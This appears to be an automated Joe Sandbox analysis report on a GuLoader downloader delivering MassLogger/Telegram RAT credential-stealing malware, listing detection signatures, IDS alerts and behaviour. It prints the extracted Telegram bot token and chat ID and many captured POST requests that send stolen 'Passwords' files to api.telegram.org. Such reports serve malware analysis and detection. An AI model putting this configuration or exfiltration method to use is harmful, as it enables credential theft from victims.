Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
V7OHj6ISEo.exe

Overview

General Information

Sample name:V7OHj6ISEo.exe
renamed because original name is a hash value
Original sample name:d7aca08687c1ffc0b01ad90f5500c968796bebf8b60995363c8d7c19be48c562.exe
Analysis ID:1588170
MD5:44ca4d83095d7f0372c1eab439f633be
SHA1:b90fdcf957fc294917a047608bb2188a1596e5e7
SHA256:d7aca08687c1ffc0b01ad90f5500c968796bebf8b60995363c8d7c19be48c562
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • V7OHj6ISEo.exe (PID: 4832 cmdline: "C:\Users\user\Desktop\V7OHj6ISEo.exe" MD5: 44CA4D83095D7F0372C1EAB439F633BE)
    • V7OHj6ISEo.exe (PID: 4136 cmdline: "C:\Users\user\Desktop\V7OHj6ISEo.exe" MD5: 44CA4D83095D7F0372C1EAB439F633BE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.1838395220.0000000005033000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: V7OHj6ISEo.exe PID: 4136JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:14:27.330649+010020577441Malware Command and Control Activity Detected192.168.2.749974149.154.167.220443TCP
            2025-01-10T22:14:29.965995+010020577441Malware Command and Control Activity Detected192.168.2.749976149.154.167.220443TCP
            2025-01-10T22:14:31.990956+010020577441Malware Command and Control Activity Detected192.168.2.749978149.154.167.220443TCP
            2025-01-10T22:14:34.010413+010020577441Malware Command and Control Activity Detected192.168.2.749980149.154.167.220443TCP
            2025-01-10T22:14:36.003361+010020577441Malware Command and Control Activity Detected192.168.2.749982149.154.167.220443TCP
            2025-01-10T22:14:37.924010+010020577441Malware Command and Control Activity Detected192.168.2.749984149.154.167.220443TCP
            2025-01-10T22:14:40.026689+010020577441Malware Command and Control Activity Detected192.168.2.749986149.154.167.220443TCP
            2025-01-10T22:14:41.704936+010020577441Malware Command and Control Activity Detected192.168.2.749988149.154.167.220443TCP
            2025-01-10T22:14:43.512462+010020577441Malware Command and Control Activity Detected192.168.2.749990149.154.167.220443TCP
            2025-01-10T22:14:45.287305+010020577441Malware Command and Control Activity Detected192.168.2.749992149.154.167.220443TCP
            2025-01-10T22:14:47.155119+010020577441Malware Command and Control Activity Detected192.168.2.749994149.154.167.220443TCP
            2025-01-10T22:14:49.270756+010020577441Malware Command and Control Activity Detected192.168.2.749996149.154.167.220443TCP
            2025-01-10T22:14:51.051763+010020577441Malware Command and Control Activity Detected192.168.2.749998149.154.167.220443TCP
            2025-01-10T22:14:53.244640+010020577441Malware Command and Control Activity Detected192.168.2.750000149.154.167.220443TCP
            2025-01-10T22:14:55.523764+010020577441Malware Command and Control Activity Detected192.168.2.750002149.154.167.220443TCP
            2025-01-10T22:14:57.378573+010020577441Malware Command and Control Activity Detected192.168.2.750004149.154.167.220443TCP
            2025-01-10T22:14:59.124615+010020577441Malware Command and Control Activity Detected192.168.2.750006149.154.167.220443TCP
            2025-01-10T22:15:00.971800+010020577441Malware Command and Control Activity Detected192.168.2.750008149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:14:19.480720+010028032742Potentially Bad Traffic192.168.2.749972132.226.8.16980TCP
            2025-01-10T22:14:26.293285+010028032742Potentially Bad Traffic192.168.2.749972132.226.8.16980TCP
            2025-01-10T22:14:29.027759+010028032742Potentially Bad Traffic192.168.2.749975132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:14:14.112061+010028032702Potentially Bad Traffic192.168.2.749970142.250.186.110443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:14:26.939576+010018100081Potentially Bad Traffic192.168.2.749974149.154.167.220443TCP
            2025-01-10T22:14:29.645099+010018100081Potentially Bad Traffic192.168.2.749976149.154.167.220443TCP
            2025-01-10T22:14:31.526788+010018100081Potentially Bad Traffic192.168.2.749978149.154.167.220443TCP
            2025-01-10T22:14:33.519198+010018100081Potentially Bad Traffic192.168.2.749980149.154.167.220443TCP
            2025-01-10T22:14:35.617891+010018100081Potentially Bad Traffic192.168.2.749982149.154.167.220443TCP
            2025-01-10T22:14:37.526401+010018100081Potentially Bad Traffic192.168.2.749984149.154.167.220443TCP
            2025-01-10T22:14:39.700762+010018100081Potentially Bad Traffic192.168.2.749986149.154.167.220443TCP
            2025-01-10T22:14:41.487017+010018100081Potentially Bad Traffic192.168.2.749988149.154.167.220443TCP
            2025-01-10T22:14:43.191974+010018100081Potentially Bad Traffic192.168.2.749990149.154.167.220443TCP
            2025-01-10T22:14:45.015199+010018100081Potentially Bad Traffic192.168.2.749992149.154.167.220443TCP
            2025-01-10T22:14:46.782618+010018100081Potentially Bad Traffic192.168.2.749994149.154.167.220443TCP
            2025-01-10T22:14:48.952941+010018100081Potentially Bad Traffic192.168.2.749996149.154.167.220443TCP
            2025-01-10T22:14:50.762232+010018100081Potentially Bad Traffic192.168.2.749998149.154.167.220443TCP
            2025-01-10T22:14:52.879449+010018100081Potentially Bad Traffic192.168.2.750000149.154.167.220443TCP
            2025-01-10T22:14:55.159692+010018100081Potentially Bad Traffic192.168.2.750002149.154.167.220443TCP
            2025-01-10T22:14:57.061818+010018100081Potentially Bad Traffic192.168.2.750004149.154.167.220443TCP
            2025-01-10T22:14:58.855354+010018100081Potentially Bad Traffic192.168.2.750006149.154.167.220443TCP
            2025-01-10T22:15:00.706930+010018100081Potentially Bad Traffic192.168.2.750008149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: V7OHj6ISEo.exeAvira: detected
            Source: 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: V7OHj6ISEo.exe.4136.7.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: V7OHj6ISEo.exeVirustotal: Detection: 76%Perma Link
            Source: V7OHj6ISEo.exeReversingLabs: Detection: 60%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CD1EC CryptUnprotectData,7_2_350CD1EC
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_350CD9D9 CryptUnprotectData,7_2_350CD9D9
            Source: V7OHj6ISEo.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49973 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.7:49970 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.7:49971 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49974 version: TLS 1.2
            Source: V7OHj6ISEo.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_0040672B FindFirstFileW,FindClose,1_2_0040672B
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405AFA
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_00402868 FindFirstFileW,1_2_00402868
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_00402868 FindFirstFileW,7_2_00402868
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_0040672B FindFirstFileW,FindClose,7_2_0040672B
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_00405AFA
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350C1042h7_2_350C0C28
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350CC985h7_2_350CC638
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350C0671h7_2_350C03AF
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350CC041h7_2_350CBD88
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350C1042h7_2_350C0C1A
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350CB791h7_2_350CB4EC
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350C1042h7_2_350C0F6F
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350CEA48h7_2_350CE79F
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350CE198h7_2_350CDEE1
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350CBBE9h7_2_350CB944
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350CC499h7_2_350CC1F2
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350CF2F8h7_2_350CF043
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350CB339h7_2_350CB07F
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350CE5F0h7_2_350CE339
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350CEEA0h7_2_350CEBF7
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 350CDD40h7_2_350CDA89
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D1882Dh7_2_37D18650
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D191B7h7_2_37D18650
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then push 00000000h7_2_37D1BDF0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D116A8h7_2_37D11400
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D16A68h7_2_37D167C0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D11250h7_2_37D10FA8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D14218h7_2_37D13F70
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D161B8h7_2_37D15F10
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D13968h7_2_37D136C0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D15908h7_2_37D15660
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D130B8h7_2_37D12E10
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D15058h7_2_37D14DB0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D12808h7_2_37D12560
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D17770h7_2_37D174C8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D11F58h7_2_37D11CB0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D16EC0h7_2_37D16C18
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D14670h7_2_37D143C8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_37D17B4F
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D16610h7_2_37D16368
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D13DC0h7_2_37D13B18
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D15D60h7_2_37D15AB8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D13510h7_2_37D13268
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D154B0h7_2_37D15208
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D12C60h7_2_37D129B8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D123B0h7_2_37D12108
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D11B00h7_2_37D11858
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D17318h7_2_37D17070
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then jmp 37D14ACAh7_2_37D14820
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then push 00000000h7_2_3824E7C8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then push 00000000h7_2_3824F316
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]7_2_3824F5D8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49974 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49974 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49976 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49980 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49976 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49980 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49990 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49990 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49986 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49986 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50004 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:50004 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49982 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49982 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49988 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49994 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49988 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49994 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49984 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49984 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50002 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:50002 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a2051f68ffHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31c2157956b1Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31d84ced9d6aHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31ee72096cabHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3205e599678fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd321be47d524aHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32332e7fb6a5Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32464c377f16Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd325ab7612621Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32706e536eceHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3284b98947fbHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd329cff2c8b35Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32ae783eaad9Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32c53cdad8c3Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32d9402b67eaHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32ed305fb91eHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3301104a174eHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3314dfea71ffHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49975 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49972 -> 132.226.8.169:80
